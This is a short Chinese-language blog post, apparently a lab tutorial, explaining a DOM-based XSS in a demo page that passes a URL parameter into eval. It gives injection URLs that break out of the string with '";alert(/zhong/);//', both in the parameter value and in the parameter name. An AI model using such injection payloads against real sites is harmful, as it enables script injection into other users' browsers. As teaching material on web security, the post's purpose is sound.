评论

收藏

[其他] 大哥带的DOM-XSS进阶eval构造XSS

网络安全 网络安全 发布于:2021-07-17 19:47 | 阅读数:475 | 评论:0

0X01源码分析
DSC0000.png

那么我们可以如何来构造语法呐??
已知eval函数可以执行js
最终的输出是eval(this.xss="你提交的参数";)
那我们是不是可以从参数这里构造一个js
比如
this.xss=1";alert(/zhong/);//
那么我们要这样构造
http://www.xss_demo.com/DOM-xss5.php?xss=k";alert(/zhong/);//
DSC0001.png

当然这里未对参数名称做验证我们也可以直接在参数名称里面构造
xss
http://www.xss_demo.com/DOM-xss5.php?xss;alert(/zhong/);//=123456
DSC0002.png

切记 学习之路 少就是多 慢就是快


关注下面的标签,发现更多相似文章